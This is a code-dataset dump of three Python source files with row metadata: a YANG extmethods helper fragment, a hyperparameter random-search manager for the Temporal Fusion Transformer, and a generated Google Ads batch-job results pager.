        :param element: (list of YANGDynClass) Child elements of the model instance
        :param path_base: (string) Path prefix built up so far during recursion
:return: (dict) A Pyangbind compatible extmethods dictionary
"""
extmethods = {}
if element is None:
return extmethods
if isinstance(element, dict):
# print '%s is a dictionary of length %d' % (element, len(element))
# yang_name = getattr(element, "yang_name") if hasattr(element, "yang_name") else None
# is_container = hasattr(element, "get")
for key, value in element.items():
path = path_base + '/' + key
config = True
                yang_name = getattr(value, "yang_name") if hasattr(value, "yang_name") else None
is_container = hasattr(value, "get")
try:
if value._is_leaf: # Protected, but I really need to know
config = value.flags.writeable
except AttributeError:
pass # Was another dictionary item or did not have a writeable flag
# Add this to our path
extmethods[path] = config
extmethods.update(self._get_extmethods(value, path_base=path))
        return extmethods
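    # Illustrative output shape (hypothetical model): an element dict such as
    # {'interfaces': {'mtu': 1500}} yields {'/interfaces': True, '/interfaces/mtu': True},
    # with False entries wherever a leaf carries a non-writeable flag.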
def _fix_extmethods(self, extmethods):
"""
Walk through the methods and fix up any parents that have no children that
are writeable.
"""
# TODO: Need to implement
return extmethods
| apache-2.0 | 7,545,779,531,491,814,000 | 36.173077 | 108 | 0.59562 | false |
google-research/google-research | tft/libs/hyperparam_opt.py | 1 | 13875 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Classes used for hyperparameter optimisation.
Two main classes exist:
1) HyperparamOptManager used for optimisation on a single machine/GPU.
2) DistributedHyperparamOptManager for multiple GPUs on different machines.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import libs.utils as utils
import numpy as np
import pandas as pd
Deque = collections.deque
class HyperparamOptManager:
"""Manages hyperparameter optimisation using random search for a single GPU.
Attributes:
param_ranges: Discrete hyperparameter range for random search.
results: Dataframe of validation results.
fixed_params: Fixed model parameters per experiment.
saved_params: Dataframe of parameters trained.
best_score: Minimum validation loss observed thus far.
optimal_name: Key to best configuration.
hyperparam_folder: Where to save optimisation outputs.
"""
def __init__(self,
param_ranges,
fixed_params,
model_folder,
override_w_fixed_params=True):
"""Instantiates model.
Args:
param_ranges: Discrete hyperparameter range for random search.
fixed_params: Fixed model parameters per experiment.
model_folder: Folder to store optimisation artifacts.
      override_w_fixed_params: Whether to override serialised fixed model
parameters with new supplied values.
"""
self.param_ranges = param_ranges
self._max_tries = 1000
self.results = pd.DataFrame()
self.fixed_params = fixed_params
self.saved_params = pd.DataFrame()
self.best_score = np.Inf
self.optimal_name = ""
# Setup
    # Create folder for saving if it's not there
self.hyperparam_folder = model_folder
utils.create_folder_if_not_exist(self.hyperparam_folder)
self._override_w_fixed_params = override_w_fixed_params
def load_results(self):
"""Loads results from previous hyperparameter optimisation.
Returns:
A boolean indicating if previous results can be loaded.
"""
print("Loading results from", self.hyperparam_folder)
results_file = os.path.join(self.hyperparam_folder, "results.csv")
params_file = os.path.join(self.hyperparam_folder, "params.csv")
if os.path.exists(results_file) and os.path.exists(params_file):
self.results = pd.read_csv(results_file, index_col=0)
self.saved_params = pd.read_csv(params_file, index_col=0)
if not self.results.empty:
self.results.at["loss"] = self.results.loc["loss"].apply(float)
self.best_score = self.results.loc["loss"].min()
is_optimal = self.results.loc["loss"] == self.best_score
self.optimal_name = self.results.T[is_optimal].index[0]
return True
return False
def _get_params_from_name(self, name):
"""Returns previously saved parameters given a key."""
params = self.saved_params
selected_params = dict(params[name])
if self._override_w_fixed_params:
for k in self.fixed_params:
selected_params[k] = self.fixed_params[k]
return selected_params
def get_best_params(self):
"""Returns the optimal hyperparameters thus far."""
optimal_name = self.optimal_name
return self._get_params_from_name(optimal_name)
def clear(self):
"""Clears all previous results and saved parameters."""
shutil.rmtree(self.hyperparam_folder)
os.makedirs(self.hyperparam_folder)
self.results = pd.DataFrame()
self.saved_params = pd.DataFrame()
def _check_params(self, params):
"""Checks that parameter map is properly defined."""
valid_fields = list(self.param_ranges.keys()) + list(
self.fixed_params.keys())
invalid_fields = [k for k in params if k not in valid_fields]
missing_fields = [k for k in valid_fields if k not in params]
if invalid_fields:
raise ValueError("Invalid Fields Found {} - Valid ones are {}".format(
invalid_fields, valid_fields))
if missing_fields:
raise ValueError("Missing Fields Found {} - Valid ones are {}".format(
missing_fields, valid_fields))
def _get_name(self, params):
"""Returns a unique key for the supplied set of params."""
self._check_params(params)
fields = list(params.keys())
fields.sort()
return "_".join([str(params[k]) for k in fields])
def get_next_parameters(self, ranges_to_skip=None):
"""Returns the next set of parameters to optimise.
Args:
ranges_to_skip: Explicitly defines a set of keys to skip.
"""
if ranges_to_skip is None:
ranges_to_skip = set(self.results.index)
if not isinstance(self.param_ranges, dict):
raise ValueError("Only works for random search!")
param_range_keys = list(self.param_ranges.keys())
param_range_keys.sort()
def _get_next():
"""Returns next hyperparameter set per try."""
parameters = {
k: np.random.choice(self.param_ranges[k]) for k in param_range_keys
}
# Adds fixed params
for k in self.fixed_params:
parameters[k] = self.fixed_params[k]
return parameters
for _ in range(self._max_tries):
parameters = _get_next()
name = self._get_name(parameters)
if name not in ranges_to_skip:
return parameters
raise ValueError("Exceeded max number of hyperparameter searches!!")
def update_score(self, parameters, loss, model, info=""):
"""Updates the results from last optimisation run.
Args:
parameters: Hyperparameters used in optimisation.
loss: Validation loss obtained.
model: Model to serialised if required.
info: Any ancillary information to tag on to results.
Returns:
Boolean flag indicating if the model is the best seen so far.
"""
if np.isnan(loss):
loss = np.Inf
if not os.path.isdir(self.hyperparam_folder):
os.makedirs(self.hyperparam_folder)
name = self._get_name(parameters)
is_optimal = self.results.empty or loss < self.best_score
# save the first model
if is_optimal:
# Try saving first, before updating info
if model is not None:
print("Optimal model found, updating")
model.save(self.hyperparam_folder)
self.best_score = loss
self.optimal_name = name
self.results[name] = pd.Series({"loss": loss, "info": info})
self.saved_params[name] = pd.Series(parameters)
self.results.to_csv(os.path.join(self.hyperparam_folder, "results.csv"))
self.saved_params.to_csv(os.path.join(self.hyperparam_folder, "params.csv"))
return is_optimal
class DistributedHyperparamOptManager(HyperparamOptManager):
"""Manages distributed hyperparameter optimisation across many gpus."""
def __init__(self,
param_ranges,
fixed_params,
root_model_folder,
worker_number,
search_iterations=1000,
num_iterations_per_worker=5,
clear_serialised_params=False):
"""Instantiates optimisation manager.
This hyperparameter optimisation pre-generates #search_iterations
hyperparameter combinations and serialises them
at the start. At runtime, each worker goes through their own set of
parameter ranges. The pregeneration
allows for multiple workers to run in parallel on different machines without
resulting in parameter overlaps.
Args:
param_ranges: Discrete hyperparameter range for random search.
fixed_params: Fixed model parameters per experiment.
root_model_folder: Folder to store optimisation artifacts.
      worker_number: Worker index defining which set of hyperparameters to
        test.
      search_iterations: Maximum number of random search iterations.
num_iterations_per_worker: How many iterations are handled per worker.
clear_serialised_params: Whether to regenerate hyperparameter
combinations.
"""
max_workers = int(np.ceil(search_iterations / num_iterations_per_worker))
# Sanity checks
if worker_number > max_workers:
raise ValueError(
"Worker number ({}) cannot be larger than the total number of workers!"
.format(max_workers))
if worker_number > search_iterations:
raise ValueError(
"Worker number ({}) cannot be larger than the max search iterations ({})!"
.format(worker_number, search_iterations))
print("*** Creating hyperparameter manager for worker {} ***".format(
worker_number))
hyperparam_folder = os.path.join(root_model_folder, str(worker_number))
super().__init__(
param_ranges,
fixed_params,
hyperparam_folder,
override_w_fixed_params=True)
serialised_ranges_folder = os.path.join(root_model_folder, "hyperparams")
if clear_serialised_params:
print("Regenerating hyperparameter list")
if os.path.exists(serialised_ranges_folder):
shutil.rmtree(serialised_ranges_folder)
utils.create_folder_if_not_exist(serialised_ranges_folder)
self.serialised_ranges_path = os.path.join(
serialised_ranges_folder, "ranges_{}.csv".format(search_iterations))
self.hyperparam_folder = hyperparam_folder # override
self.worker_num = worker_number
self.total_search_iterations = search_iterations
self.num_iterations_per_worker = num_iterations_per_worker
self.global_hyperparam_df = self.load_serialised_hyperparam_df()
self.worker_search_queue = self._get_worker_search_queue()
@property
def optimisation_completed(self):
    return not self.worker_search_queue
def get_next_parameters(self):
"""Returns next dictionary of hyperparameters to optimise."""
param_name = self.worker_search_queue.pop()
params = self.global_hyperparam_df.loc[param_name, :].to_dict()
# Always override!
for k in self.fixed_params:
print("Overriding saved {}: {}".format(k, self.fixed_params[k]))
params[k] = self.fixed_params[k]
return params
def load_serialised_hyperparam_df(self):
"""Loads serialsed hyperparameter ranges from file.
Returns:
DataFrame containing hyperparameter combinations.
"""
print("Loading params for {} search iterations form {}".format(
self.total_search_iterations, self.serialised_ranges_path))
    if os.path.exists(self.serialised_ranges_path):
      df = pd.read_csv(self.serialised_ranges_path, index_col=0)
    else:
      print("Unable to load - regenerating search ranges instead")
df = self.update_serialised_hyperparam_df()
return df
def update_serialised_hyperparam_df(self):
"""Regenerates hyperparameter combinations and saves to file.
Returns:
DataFrame containing hyperparameter combinations.
"""
search_df = self._generate_full_hyperparam_df()
print("Serialising params for {} search iterations to {}".format(
self.total_search_iterations, self.serialised_ranges_path))
search_df.to_csv(self.serialised_ranges_path)
return search_df
def _generate_full_hyperparam_df(self):
"""Generates actual hyperparameter combinations.
Returns:
DataFrame containing hyperparameter combinations.
"""
np.random.seed(131) # for reproducibility of hyperparam list
name_list = []
param_list = []
for _ in range(self.total_search_iterations):
params = super().get_next_parameters(name_list)
name = self._get_name(params)
name_list.append(name)
param_list.append(params)
full_search_df = pd.DataFrame(param_list, index=name_list)
return full_search_df
def clear(self): # reset when cleared
"""Clears results for hyperparameter manager and resets."""
super().clear()
self.worker_search_queue = self._get_worker_search_queue()
def load_results(self):
"""Load results from file and queue parameter combinations to try.
Returns:
Boolean indicating if results were successfully loaded.
"""
success = super().load_results()
if success:
self.worker_search_queue = self._get_worker_search_queue()
return success
def _get_worker_search_queue(self):
"""Generates the queue of param combinations for current worker.
Returns:
Queue of hyperparameter combinations outstanding.
"""
global_df = self.assign_worker_numbers(self.global_hyperparam_df)
worker_df = global_df[global_df["worker"] == self.worker_num]
left_overs = [s for s in worker_df.index if s not in self.results.columns]
return Deque(left_overs)
def assign_worker_numbers(self, df):
"""Updates parameter combinations with the index of the worker used.
Args:
df: DataFrame of parameter combinations.
Returns:
Updated DataFrame with worker number.
"""
output = df.copy()
n = self.total_search_iterations
batch_size = self.num_iterations_per_worker
max_worker_num = int(np.ceil(n / batch_size))
worker_idx = np.concatenate([
np.tile(i + 1, self.num_iterations_per_worker)
for i in range(max_worker_num)
])
output["worker"] = worker_idx[:len(output)]
return output
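    # For example (illustrative): total_search_iterations=10 with
    # num_iterations_per_worker=3 gives worker_idx [1, 1, 1, 2, 2, 2, 3, 3, 3, 4]
    # after truncation, so the last worker handles a single combination.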
| apache-2.0 | 4,648,941,923,380,568,000 | 30.678082 | 84 | 0.683099 | false |
googleads/google-ads-python | google/ads/googleads/v8/services/services/batch_job_service/pagers.py | 1 | 3313 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, Callable, Iterable, Sequence, Tuple
from google.ads.googleads.v8.services.types import batch_job_service
class ListBatchJobResultsPager:
"""A pager for iterating through ``list_batch_job_results`` requests.
This class thinly wraps an initial
:class:`google.ads.googleads.v8.services.types.ListBatchJobResultsResponse` object, and
provides an ``__iter__`` method to iterate through its
``results`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListBatchJobResults`` requests and continue to iterate
through the ``results`` field on the
corresponding responses.
All the usual :class:`google.ads.googleads.v8.services.types.ListBatchJobResultsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., batch_job_service.ListBatchJobResultsResponse],
request: batch_job_service.ListBatchJobResultsRequest,
response: batch_job_service.ListBatchJobResultsResponse,
metadata: Sequence[Tuple[str, str]] = (),
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (:class:`google.ads.googleads.v8.services.types.ListBatchJobResultsRequest`):
The initial request object.
response (:class:`google.ads.googleads.v8.services.types.ListBatchJobResultsResponse`):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = batch_job_service.ListBatchJobResultsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[batch_job_service.ListBatchJobResultsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(
self._request, metadata=self._metadata
)
yield self._response
def __iter__(self) -> Iterable[batch_job_service.BatchJobResult]:
for page in self.pages:
yield from page.results
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
| apache-2.0 | 1,347,235,011,634,477,000 | 39.901235 | 99 | 0.674011 | false |